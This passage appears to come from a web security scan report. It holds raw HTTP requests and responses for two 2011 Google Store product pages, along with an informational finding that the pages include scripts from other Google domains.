Cookie: ASP.NET_SessionId=4n1rd3u3ovrt2o45f1fvmo45; __utma=148589601.1599814706.1319223601.1319223601.1319223601.1; __utmb=148589601.34.10.1319223601; __utmc=148589601; __utmz=148589601.1319223601.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SupportCookies=true

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24215
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Oct 2011 19:19:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Momentum Computer Portfolio</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
       <meta name='keywords' content='' />
       <meta name='description' content='' />

<script type="text/javascript">
var r = Math.random();
var t = document.createElement("img");
t.onload = function() {
var t2 = document.createElement("img");
t2.onload = function() {
var t3 = document.createElement("img");
t3.onload = function() { return; };
t3.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp3&random=" + r;
};
t2.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp2&random=" + r;
};
t.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp1&random=" + r;
</script>
<noscript>
<img src="http://www.google-analytics.com/__utm.gif?label=ct_gs_exp_ns" />
</noscript>

<script language="JavaScript" type="text/JavaScript" src="/js/common.js"></script>
    <link href="/css/main.css" rel="stylesheet" type="text/css" />
    <link href="/css/home.css" rel="stylesheet" type="text/css" />
    
    <link rel="stylesheet" href="/css/syat.css" type="text/css" media="screen" />

<script type="text/javascript">
function click(theevent){
try{
firstTracker._trackEvent('product_page', theevent);
}catch(err){ }
}
</script>
   </head>
<body>
<div id="wrapper">
    <div id="header" style="height:70px">




        <a href="/shop.axd/Home"><img src="/images/googlestore_logo.gif" alt="GoogleStore" /></a>

    <div style="width:100%;position:absolute; top:0; right:0px; width:90px; height:52px;">
    <a href="/You+Tube/"><img style="border:0" src="/images/new_top_link.jpg" alt="Check Out the You Tube Items" /></a>
    </div>

    <ul>
    <li><a href="/You+Tube/">You Tube Home</a></li>
    <li><a href="http://www.google.com">Google Search</a></li>
    <li><a href="http://www.google.com/about.html">About Google</a></li>
    </ul>

    </div>

<div id="left_content">



<div class="box-round">
<div class="top"><span><h2 class="side_head">Categories</h2></span></div>
<div class="center-content">
<ul>
</li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/accessories_off.gif) left no-repeat;" href=/googlesearch.aspx?category=accessories >Accessories</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/fun_off.gif) left no-repeat;" href=/googlesearch.aspx?category=fun >Fun</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/kids_off.gif) left no-repeat;" href=/googlesearch.aspx?category=kids >Kids</a></li><li class="nav on" style="position:relative;"><a class="main" style="background:url(/images/category_icons/office_on.gif) left no-repeat;" href=/googlesearch.aspx?category=office >Office</a><ul class="item_list"><li><a href="/Office/Moon+Glow+USB+Hub.axd">Moon Glow USB Hub</a></li><li><a href="/Office/Gmail+Mousepad.axd">Gmail Mousepad</a></li><li><a href="/Office/Chrome+Mousepad.axd">Chrome Mousepad</a></li><li><a href="/Office/Compact+Journal.axd">Compact Journal</a></li><li><a href="/Office/Grinder+Brief+Bag.axd">Grinder Brief Bag</a></li><li><a href="/Office/Chrome+Notepad.axd">Chrome Notepad</a></li><li><a href="/Office/Mechanical+Colored+Pencil+Pack.axd">Mechanical Colored Pencil Pack</a></li><li><a class="product_on" href="/Office/Momentum+Computer+Portfolio.axd">Momentum Computer Portfolio</a></li><li><a href="/Office/Custom+Graphics+Apps+Pad.axd">Custom Graphics Apps Pad</a></li><li><a href="/Office/Android+Puffy+Print+Pen.axd">Android Puffy Print Pen</a></li><li><a href="/Office/Pack+of+10+Recycled+Paper+Pencils.axd">Pack of 10 Recycled Paper Pencils</a></li><li><a href="/Office/Scent-Sational+Pencil.axd">Scent-Sational Pencil</a></li><li><a href="/Office/Wide+Body+Clear+Pen.axd">Wide Body Clear Pen</a></li><li><a href="/Office/Summer+of+Love+II+Pens.axd">Summer of Love II Pens</a></li><li><a href="/Office/Reversible+Neoprene+Laptop+Sleeve.axd">Reversible Neoprene Laptop Sleeve</a></li><li><a href="/Office/Window+Ballpoint+Pen.axd">Window Ballpoint Pen</a></li><li><a href="/Office/Laptop+and+Cell+Phone+Stickers.axd">Laptop and Cell Phone Stickers</a></li><li><a href="/Office/Recycled+7+x+10+Journal.axd">Recycled 7" x 10" Journal</a></li><li><a href="/Office/5+x+7+Mod+Print+Notebook.axd">5" x 7" Mod Print Notebook</a></li><li><a href="/Kids/Android+Jotter.axd?cid=446">Android Jotter</a></li><li><a href="/Office/Vertex+Computer+Backpack.axd">Vertex Computer Backpack</a></li><li><a href="/Office/Timbuk2+Messenger+Bag.axd">Timbuk2 Messenger Bag</a></li><li><a href="/Office/Recycled+Checkpoint+Friendly+Computer+Bag.axd">Recycled Checkpoint Friendly Computer Bag</a></li><li><a href="/Office/Pack+of+4+Google+Ballpoint+Pens.axd">Pack of 4 Google Ballpoint Pens</a></li><li><a href="/Office/Glow+Barrel+Pen.axd">Glow Barrel Pen</a></li></ul></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/wearables_off.gif) left no-repeat;" href=/googlesearch.aspx?category=wearables >Wearables</a></li><li class="nav off"><a class="main textpopup" onclick="recordOutboundLink(this, 'Outbound Links', 'Zazzle.com LeftNav');return false;" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." style="background:url(/images/category_icons/doodles_off.gif) left no-repeat;" href=http://www.zazzle.com/googledoodles >Doodles on Demand</a></li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Eco Reference</h2></span></div>
<div class="center-content">
<ul class="eco_guide">
<li style="background:url(/images/greeninitiative/1.jpg) no-repeat left;">Sustainable</li>
<li style="background:url(/images/greeninitiative/2.jpg) no-repeat left;">Organic</li>
<li style="background:url(/images/greeninitiative/3.jpg) no-repeat left;">Recycled</li>
<li style="background:url(/images/greeninitiative/4.jpg) no-repeat left;">Non-Polluting</li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>

</div>
<div id="content">

<script type="text/javascript" src="/js/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="/js/addtl.js"></script>
<link rel="stylesheet" href="/css/popup.css" />

<style type="text/css">
.search_top
{
    font-size:15px;
    margin-bottom:15px;
}
.search_top select{ font-size:13px;}
</style>

<div class="search_top">

<form action="/googlesearch.aspx" id="search" method="get">
<b>Search:</b>
<select name="category">

<option value="all">All Products</option>
<option value="eco" >Eco-Friendly</option>
<option value="wearables" >Wearables</option>
<option value="youtube" >You Tube</option>
<option value="accessories" >Accessories</option>
<option value="office" >Office</option>
<option value="doodles" >Doodles</option>
<option value="kids" >Kids</option>
<option value="fun" >Fun</option>
<option value="apps" >Apps</option>
</select>

<input name="q" id="q" autocomplete="off" class="searchbox" style="width:280px; color:#333;" value="keyword / item #" autocomplete="off" onfocus="if(this.value=='keyword / item #')value=''" onblur="if(this.value=='')value='keyword / item #';" type="text"/>
<input type="image" src="/images/btn_search.gif" class="button" value="search" />
</form>

</div>
<div id="product">

<h1>Office</h1>

<div id="breadcrumbs_only">

<a href="http://www.googlestore.com/shop.axd/Home">Home</a> <span>/</span>

<a href="/Office/">Office</a>
</div>
   <div id="product_info">

<style type="text/css">
.p_desc ul{
list-style-type:disc;
margin:10px;
}

.p_desc{ margin:10px 0px;}
</style>

<table border="0" cellpadding="0" cellspacing="0" class="product_table">
<form action="/shop.axd/AddToCartBP" method="post" name="frmProductDetails">
<input type="hidden" name="type" value="R">

<input type="hidden" name="cid" value="446">

<input type="hidden" name="item_no" value="10 41112">
<input type="hidden" name="edp_no" value="22825">
<input type="hidden" name="keywords" value="">
<input type="hidden" name="page_no" value="">

<tr>
<td width="10"><img src="/images/spacer.gif" width="10" height="1"></td>
<td width="50%" valign="top">

<div id="product-image-wrap">
<a id="ProductImageHref" onclick="click('Enlarge Image')" style="text-decoration:none;" href="javascript:newWindow('/view_large.aspx?img=%2fimages%2fproducts%2fdirs%2f10+41112%2f10-41112.jpg&edp_no=22825',420,600)">
<img id="ProductImage" width="225px" src="/images/products/dirs/10 41112/10-41112A.jpg" alt="" />
</a>

<div style="position:relative; overflow:hidden; width:215px">
<a style="float:left;" onclick="click('Enlarge Image')" href="javascript:newWindow('/view_large.aspx?img=%2fimages%2fproducts%2fdirs%2f10+41112%2f10-41112.jpg&edp_no=22825',420,600)" class="enlarge">Enlarge image</a>

</div>
</div>

<span class='mhead' style='background:#FFF;'>Mouseover image to view</span><ul id="multiple"><li><li><a style="border:1px solid #FFF;" href="javascript:newWindow('/view_large.aspx?img=%2fimages%2fproducts%2fdirs%2f10+41112%2f10-41112.jpg&edp_no=22825',420,600)"><img style="border:1px solid #eee;" src='/images/products/dirs/10 41112/10-41112-OpenC.jpg' alt='' /></a></li><li><a style="border:1px solid #FFF;" href="javascript:newWindow('/view_large.aspx?img=%2fimages%2fproducts%2fdirs%2f10+41112%2f10-41112.jpg&edp_no=22825',420,600)"><img style="border:1px solid #eee;" src='/images/products/dirs/10 41112/10-41112-SideC.jpg' alt='' /></a></li><li><a style="border:1px solid #FFF;" href="javascript:newWindow('/view_large.aspx?img=%2fimages%2fproducts%2fdirs%2f10+41112%2f10-41112.jpg&edp_no=22825',420,600)"><img style="border:1px solid #eee;" src='/images/products/dirs/10 41112/10-41112C.jpg' alt='' /></a></li></li></ul>

<script type="text/javascript">

var mainSrc = $("#ProductImage").attr("src");
$("#multiple li a").bind("mouseenter", function(e){
$(this).css("border","1px solid #eee");
var ssrc = $(this).children("img").attr("src");
var inum = $(this).children("img").attr("id");
var medSrc = $("#i" + inum).attr("src");
if(medSrc == undefined){
medSrc = ssrc.replace("C.jpg","A.jpg");
}
$("#ProductImage").attr("src",medSrc);

});

$("#multiple li a").bind("mouseleave", function(e){
$(this).css("border","1px solid #FFF");
});

$("#multiple").bind("mouseleave", function(e){
$("#ProductImage").attr("src","/images/products/dirs/10 41112/10-41112A.jpg");
});
</script>

</td>
<td width="50%" valign="top" class="product_details">
<h2>Momentum Computer Portfolio</h2>
        <b>Item #:</b> 10 41112



<div class="p_desc">Flying through airport security has never been so easy. The back-zippered compartment features a Viewpoint System computer sleeve with detachment buckle and clear window for easy laptop scanning (fits up to 15.4" laptop). The back- zippered pocket stores hideaway backpack straps, and the bottom zippered pocket is perfect to store MP3 players with an outlet for earphones. Comes in black with the full-color logo.</div>



        <div class="price">
<b>Price:</b> $51.40
</div>


<p class="inputblock">
<b>Qty: </b><input name="qty" type="text" value="1" size="1" style="width:20px;" maxlength="3" />

  <b>Inventory:</b> 104

</p>

<table><tr>
<td align="left">

<a href="http://www.googlestore.com/Office/cid=446/shop.axd/Category"><img src="/images/btn_continueshopping.gif" border=0></a>


  

<input name="imageField" id="submit_btn_reg" onclick="click('Add To Cart')" type="image" src="/images/btn_addtocart.gif" border="0">

</td></tr>
</table>

</td>
<td width="10"><img src="/images/spacer.gif" width="10" height="1" /></td>
</tr>

</form>
</table>

<br />
<b class="b_header">You may also like...</b>
<div id="cross_sells">
<ul>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/Grinder Brief Bag : Momentum Computer Portfolio');" href="/Office/Grinder+Brief+Bag.axd"><img src="/images/products/dirs/10 44108/10-44108B.jpg" alt="Grinder Brief Bag" /></a>
<div class="price">
<b>Price:</b> $52.35
</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/Grinder Brief Bag : Momentum Computer Portfolio');" href="/Office/Grinder+Brief+Bag.axd">Grinder Brief Bag</a>
</li>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/Metallic Leather Back Journal : Momentum Computer Portfolio');" href="/Office/Metallic+Leather+Back+Journal.axd"><img src="/images/products/dirs/10 53010/10-53010B.jpg" alt="Metallic Leather Back Journal" /></a>
<div class="price">
<b>Price:</b> $13.50
</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/Metallic Leather Back Journal : Momentum Computer Portfolio');" href="/Office/Metallic+Leather+Back+Journal.axd">Metallic Leather Back Journal</a>
</li>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/Android Puffy Print Pen : Momentum Computer Portfolio');" href="/Office/Android+Puffy+Print+Pen.axd"><img src="/images/products/dirs/10 55047/10-55047B.jpg" alt="Puffy Print Android BIC Pen" /></a>
<div class="price">
<b>Price:</b> $1.40
</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/Android Puffy Print Pen : Momentum Computer Portfolio');" href="/Office/Android+Puffy+Print+Pen.axd">Puffy Print Android BIC Pen</a>
</li>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/Gmail Mousepad : Momentum Computer Portfolio');" href="/Office/Gmail+Mousepad.axd"><img src="/images/products/dirs/10 55053/10-55053B.jpg" alt="Gmail Mousepad" /></a>
<div class="price">
<b>Price:</b> $4.10
</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/Gmail Mousepad : Momentum Computer Portfolio');" href="/Office/Gmail+Mousepad.axd">Gmail Mousepad</a>
</li>

</ul>
</div>

   </div>

   <img src="http://int.teracent.net/tase/int?adv=296&fmt=redir&sec=0&pid=prod&prodID=1041112" width="1" height="1" />
</div>
</div>
<div id="right_content">



<style type="text/css">
.signup-tb{
width:135px;
font-size:.9em;
margin-top:5px;
margin-bottom:5px;
}

.signup-btn{
font-size:.9em;
}

.lblMessage{
font-weight:bold;

}

.formsuccess{
font-weight:bold;
color:green;
}

.formerror{
font-weight:bold;
color:red; }
</style>

<div class="box-round" style="margin-bottom:10px;">
<div class="top">
<span>
<h2 class="side_head">Newsletter Signup</h2>
</span>
</div>

<div class="center-content">
<span id="Template_ctlRightNav_ctlSignup_Label1" class="lblMessage">I want to receive promotional email from GatewayCDI.</span><br />
<form name="aspnetForm" method="post" action="#" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUENTM4MQ9kFgJmD2QWAgIDD2QWAgIFD2QWAmYPZBYCAgEPZBYCAgMPDxYCHghJbWFnZVVybAUWL2ltYWdlcy9idG5fc2lnbnVwLmdpZmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBShUZW1wbGF0ZSRjdGxSaWdodE5hdiRjdGxTaWdudXAkYnRuU2lnblVw" />
</div>

<div>

   <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwL5t4CVDgKc3s3hCgKHlcOwBw==" />
</div>
<input name="Template$ctlRightNav$ctlSignup$EmailAddress" type="text" maxlength="50" id="Template_ctlRightNav_ctlSignup_EmailAddress" class="signup-tb" />
<input type="image" name="Template$ctlRightNav$ctlSignup$btnSignUp" id="Template_ctlRightNav_ctlSignup_btnSignUp" src="/images/btn_signup.gif" style="border-width:0px;" />
</form>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round">
<div class="top">
<span>
<h2 class="side_head">Store Links</h2>
</span>
</div>
<div class="center-content">
<ul class="store-links">
<li><a href="/shop.axd/Cart" class="shopping-cart">Shopping Cart (10)</a></li>

<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Contact#warranty">Warranty / Returns</a></li>

</ul>

<ul>

<li><a href="/googlesearch.aspx?topseller=yes">Top Sellers</a></li>
<li><a href="/googlesearch.aspx?isnew=yes">What's New</a></li>
<li><a href="/googlesearch.aspx?category=eco">Eco-Friendly Items</a></li>
<li><a href="/googlesearch.aspx?specials=yes">Specials</a></li>
<li><a href="/Mini/"><b>Google Mini</b></a></li>

</ul>
</div>
<div class="bottom"><span></span></div>
</div>

</div>

<div id="footer">


<ul id="navigation_footer_ul">
<li><a href=/Accessories/ >Accessories</a></li><li><a href=/Fun/ >Fun</a></li><li><a href=/Kids/ >Kids</a></li><li><a href=/Office/ >Office</a></li><li><a href=/Wearables/ >Wearables</a></li><li><a class="textpopup" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." onclick="target='_blank'" href=http://www.zazzle.com/googledoodles >Doodles</a></li>
<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Cart">Shopping Cart</a></li>
</ul>
<div id="legal">
Copyright Google Inc. All Rights Reserved.<br />
Use of this service constitutes your acceptance of the Google Store's <a href="/shop.axd/PrivacyPolicy">privacy policy</a>.
</div>

<script type="text/javascript" src="/js/jquery-latest.js"></script>
<script type="text/javascript" src="/js/jquery.dimensions.js"></script>
<script type="text/javascript" src="/js/jquery.tooltip.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$(".ecotags").tooltip({
   showURL: false });
   $(".textpopup").tooltip({showURL: false,effect: "bouncy" });

$("#DoodleDrop").bind("change",function(){
var imgname = $('option:selected',this).attr("id");
var edpNo = '22825';
if(imgname!=""){
$("#ProductImage").attr("src","/images/DOODLES/"+imgname+"_A.jpg");
}
$("#ProductImageHref").attr("href","javascript:newWindow('/view_large.aspx?img=/images/DOODLES/"+imgname+"_.jpg+&edp_no="+edpNo+"',420,600)");
});

$("#searchfilters select").bind("change",function(){
var url = $('option:selected',this).val();
if(url!=""){window.location = url;}

});

});
</script>

<script src="https://www.google.com/jsapi" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="https://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script><script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</div>
    </div>
    <script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write("<sc" + "ript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'>" + "</sc" + "ript>");
</script>

<script type="text/javascript">
var firstTracker = _gat._getTracker("UA-30481-1");
firstTracker._initData();
var ga = ga || {};
ga.special = 'regular';

ga.isNew = 'no';

firstTracker._setCustomVar(1, 'price', ga.special, 3);
firstTracker._setCustomVar(2, 'is new', ga.isNew, 3);
firstTracker._trackPageview();

var secondTracker = _gat._getTracker("UA-735212-16");
secondTracker._setLocalRemoteServerMode();
secondTracker._initData();
secondTracker._trackPageview();

</script>

<div id="backgroundPopup"></div>

   </body>
</html>

4.5. http://www.googlestore.com/Office/Pack+of+10+Recycled+Paper+Pencils.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/Office/Pack+of+10+Recycled+Paper+Pencils.axd

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js
https://www.google.com/cse/intl/en-US/sayt.js
https://www.google.com/jsapi

Request

GET /Office/Pack+of+10+Recycled+Paper+Pencils.axd HTTP/1.1
Host: www.googlestore.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.googlestore.com/Office/Momentum+Computer+Portfolio.axd
Cookie: ASP.NET_SessionId=4n1rd3u3ovrt2o45f1fvmo45; __utma=148589601.1599814706.1319223601.1319223601.1319223601.1; __utmb=148589601.37.9.1319224888597; __utmc=148589601; __utmz=148589601.1319223601.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SupportCookies=true

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22855
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Oct 2011 19:21:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Pack of 10 Recycled Paper Pencils</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
       <meta name='keywords' content='' />
       <meta name='description' content='' />

<script type="text/javascript">
var r = Math.random();
var t = document.createElement("img");
t.onload = function() {
var t2 = document.createElement("img");
t2.onload = function() {
var t3 = document.createElement("img");
t3.onload = function() { return; };
t3.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp3&random=" + r;
};
t2.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp2&random=" + r;
};
t.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp1&random=" + r;
</script>
<noscript>
<img src="http://www.google-analytics.com/__utm.gif?label=ct_gs_exp_ns" />
</noscript>

<script language="JavaScript" type="text/JavaScript" src="/js/common.js"></script>
    <link href="/css/main.css" rel="stylesheet" type="text/css" />
    <link href="/css/home.css" rel="stylesheet" type="text/css" />
    
    <link rel="stylesheet" href="/css/syat.css" type="text/css" media="screen" />

<script type="text/javascript">
function click(theevent){
try{
firstTracker._trackEvent('product_page', theevent);
}catch(err){ }
}
</script>
   </head>
<body>
<div id="wrapper">
    <div id="header" style="height:70px">




        <a href="/shop.axd/Home"><img src="/images/googlestore_logo.gif" alt="GoogleStore" /></a>

    <div style="width:100%;position:absolute; top:0; right:0px; width:90px; height:52px;">
    <a href="/You+Tube/"><img style="border:0" src="/images/new_top_link.jpg" alt="Check Out the You Tube Items" /></a>
    </div>

    <ul>
    <li><a href="/You+Tube/">You Tube Home</a></li>
    <li><a href="http://www.google.com">Google Search</a></li>
    <li><a href="http://www.google.com/about.html">About Google</a></li>
    </ul>

    </div>

<div id="left_content">



<div class="box-round">
<div class="top"><span><h2 class="side_head">Categories</h2></span></div>
<div class="center-content">
<ul>
</li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/accessories_off.gif) left no-repeat;" href=/googlesearch.aspx?category=accessories >Accessories</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/fun_off.gif) left no-repeat;" href=/googlesearch.aspx?category=fun >Fun</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/kids_off.gif) left no-repeat;" href=/googlesearch.aspx?category=kids >Kids</a></li><li class="nav on" style="position:relative;"><a class="main" style="background:url(/images/category_icons/office_on.gif) left no-repeat;" href=/googlesearch.aspx?category=office >Office</a><ul class="item_list"><li><a href="/Office/Moon+Glow+USB+Hub.axd">Moon Glow USB Hub</a></li><li><a href="/Office/Gmail+Mousepad.axd">Gmail Mousepad</a></li><li><a href="/Office/Chrome+Mousepad.axd">Chrome Mousepad</a></li><li><a href="/Office/Compact+Journal.axd">Compact Journal</a></li><li><a href="/Office/Grinder+Brief+Bag.axd">Grinder Brief Bag</a></li><li><a href="/Office/Chrome+Notepad.axd">Chrome Notepad</a></li><li><a href="/Office/Mechanical+Colored+Pencil+Pack.axd">Mechanical Colored Pencil Pack</a></li><li><a href="/Office/Momentum+Computer+Portfolio.axd">Momentum Computer Portfolio</a></li><li><a href="/Office/Custom+Graphics+Apps+Pad.axd">Custom Graphics Apps Pad</a></li><li><a href="/Office/Android+Puffy+Print+Pen.axd">Android Puffy Print Pen</a></li><li><a class="product_on" href="/Office/Pack+of+10+Recycled+Paper+Pencils.axd">Pack of 10 Recycled Paper Pencils</a></li><li><a href="/Office/Scent-Sational+Pencil.axd">Scent-Sational Pencil</a></li><li><a href="/Office/Wide+Body+Clear+Pen.axd">Wide Body Clear Pen</a></li><li><a href="/Office/Summer+of+Love+II+Pens.axd">Summer of Love II Pens</a></li><li><a href="/Office/Reversible+Neoprene+Laptop+Sleeve.axd">Reversible Neoprene Laptop Sleeve</a></li><li><a href="/Office/Window+Ballpoint+Pen.axd">Window Ballpoint Pen</a></li><li><a href="/Office/Laptop+and+Cell+Phone+Stickers.axd">Laptop and Cell Phone Stickers</a></li><li><a href="/Office/Recycled+7+x+10+Journal.axd">Recycled 7" x 10" Journal</a></li><li><a href="/Office/5+x+7+Mod+Print+Notebook.axd">5" x 7" Mod Print Notebook</a></li><li><a href="/Kids/Android+Jotter.axd?cid=446">Android Jotter</a></li><li><a href="/Office/Vertex+Computer+Backpack.axd">Vertex Computer Backpack</a></li><li><a href="/Office/Timbuk2+Messenger+Bag.axd">Timbuk2 Messenger Bag</a></li><li><a href="/Office/Recycled+Checkpoint+Friendly+Computer+Bag.axd">Recycled Checkpoint Friendly Computer Bag</a></li><li><a href="/Office/Pack+of+4+Google+Ballpoint+Pens.axd">Pack of 4 Google Ballpoint Pens</a></li><li><a href="/Office/Glow+Barrel+Pen.axd">Glow Barrel Pen</a></li></ul></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/wearables_off.gif) left no-repeat;" href=/googlesearch.aspx?category=wearables >Wearables</a></li><li class="nav off"><a class="main textpopup" onclick="recordOutboundLink(this, 'Outbound Links', 'Zazzle.com LeftNav');return false;" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." style="background:url(/images/category_icons/doodles_off.gif) left no-repeat;" href=http://www.zazzle.com/googledoodles >Doodles on Demand</a></li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Eco Reference</h2></span></div>
<div class="center-content">
<ul class="eco_guide">
<li style="background:url(/images/greeninitiative/1.jpg) no-repeat left;">Sustainable</li>
<li style="background:url(/images/greeninitiative/2.jpg) no-repeat left;">Organic</li>
<li style="background:url(/images/greeninitiative/3.jpg) no-repeat left;">Recycled</li>
<li style="background:url(/images/greeninitiative/4.jpg) no-repeat left;">Non-Polluting</li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>

</div>
<div id="content">

<script type="text/javascript" src="/js/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="/js/addtl.js"></script>
<link rel="stylesheet" href="/css/popup.css" />

<style type="text/css">
.search_top
{
    font-size:15px;
    margin-bottom:15px;
}
.search_top select{ font-size:13px;}
</style>

<div class="search_top">

<form action="/googlesearch.aspx" id="search" method="get">
<b>Search:</b>
<select name="category">

<option value="all">All Products</option>
<option value="eco" >Eco-Friendly</option>
<option value="wearables" >Wearables</option>
<option value="youtube" >You Tube</option>
<option value="accessories" >Accessories</option>
<option value="office" >Office</option>
<option value="doodles" >Doodles</option>
<option value="kids" >Kids</option>
<option value="fun" >Fun</option>
<option value="apps" >Apps</option>
</select>

<input name="q" id="q" autocomplete="off" class="searchbox" style="width:280px; color:#333;" value="keyword / item #" autocomplete="off" onfocus="if(this.value=='keyword / item #')value=''" onblur="if(this.value=='')value='keyword / item #';" type="text"/>
<input type="image" src="/images/btn_search.gif" class="button" value="search" />
</form>

</div>
<div id="product">

<h1>Office</h1>

<div id="breadcrumbs_only">

<a href="http://www.googlestore.com/shop.axd/Home">Home</a> <span>/</span>

<a href="/Office/">Office</a>
</div>
   <div id="product_info">

<style type="text/css">
.p_desc ul{
list-style-type:disc;
margin:10px;
}

.p_desc{ margin:10px 0px;}
</style>

<table border="0" cellpadding="0" cellspacing="0" class="product_table">
<form action="/shop.axd/AddToCartBP" method="post" name="frmProductDetails">
<input type="hidden" name="type" value="R">

<input type="hidden" name="cid" value="446">

<input type="hidden" name="item_no" value="10 51006">
<input type="hidden" name="edp_no" value="18930">
<input type="hidden" name="keywords" value="">
<input type="hidden" name="page_no" value="">

<tr>
<td width="10"><img src="/images/spacer.gif" width="10" height="1"></td>
<td width="50%" valign="top">

<div id="product-image-wrap">
<a id="ProductImageHref" onclick="click('Enlarge Image')" style="text-decoration:none;" href="javascript:newWindow('/view_large.aspx?img=%2fcontent%2fimages%2flarge%2f10+56001.jpg&edp_no=18930',420,600)">
<img id="ProductImage" width="225px" src="/content/images/standard/10 56001a.jpg" alt="" />
</a>
<img class="ecotags" src="/images/greeninitiative/recycled_s.jpg" title="Made out of high-quality recycled materials.">

<img style="position:absolute; top:0px;right:2px;" src="/content/Images/flagUSA.JPG" alt="Made In USA" title="Made In USA">

<div style="position:relative; overflow:hidden; width:215px">
<a style="float:left;" onclick="click('Enlarge Image')" href="javascript:newWindow('/view_large.aspx?img=%2fcontent%2fimages%2flarge%2f10+56001.jpg&edp_no=18930',420,600)" class="enlarge">Enlarge image</a>

</div>
</div>

<script type="text/javascript">

var mainSrc = $("#ProductImage").attr("src");
$("#multiple li a").bind("mouseenter", function(e){
$(this).css("border","1px solid #eee");
var ssrc = $(this).children("img").attr("src");
var inum = $(this).children("img").attr("id");
var medSrc = $("#i" + inum).attr("src");
if(medSrc == undefined){
medSrc = ssrc.replace("C.jpg","A.jpg");
}
$("#ProductImage").attr("src",medSrc);

});

$("#multiple li a").bind("mouseleave", function(e){
$(this).css("border","1px solid #FFF");
});

